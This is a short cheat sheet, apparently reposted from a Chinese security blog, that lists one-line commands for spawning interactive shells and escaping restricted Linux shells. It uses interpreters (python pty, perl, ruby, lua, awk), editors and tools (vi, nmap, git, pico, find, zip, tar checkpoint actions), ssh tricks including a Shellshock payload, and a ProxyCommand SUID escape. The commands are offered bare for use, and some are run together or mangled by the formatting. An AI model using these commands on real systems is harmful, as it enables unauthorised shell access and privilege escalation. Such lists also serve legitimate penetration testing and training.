Spawning A TTY Shell-逃逸 Linux 各种 Shell 来执行命令

python -c 'import pty; pty.spawn("/bin/sh")' echo os.system('/bin/bash') /bin/sh -i perl —e 'exec "/bin/sh";' perl: exec "/bin/sh"; ruby: exec "/bin/sh" lua: os.execute('/bin/sh') From within IRB exec "/bin/sh" From within vi :!bash :set shell=/bin/bash:shell From within nmap !sh From scp： scp -S /path/yourscript x y: AWK: awk 'BEGIN {system("/bin/sh or /bin/bash")}' find: find / -name test -exec /bin/sh or /bin/bash ; ssh: ssh username@IP – t "/bin/sh" or "/bin/bash" ssh username@IP -t "bash –noprofile" ssh username@IP -t "() { :; }; /bin/bash" (shellshock) ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID) git 帮助状态下通过!/bin/bash 进入交互式 shell pico -s "/bin/bash"进入编辑器写入/bin/bash 然后按 ctrl + T 键 zip /tmp/test.zip /tmp/test -T –unzip-command="sh -c /bin/bash" tar cf /dev/null testfile –checkpoint=1 –checkpointaction=exec=/bin/bash 文章来源于：lsh4ck's Blog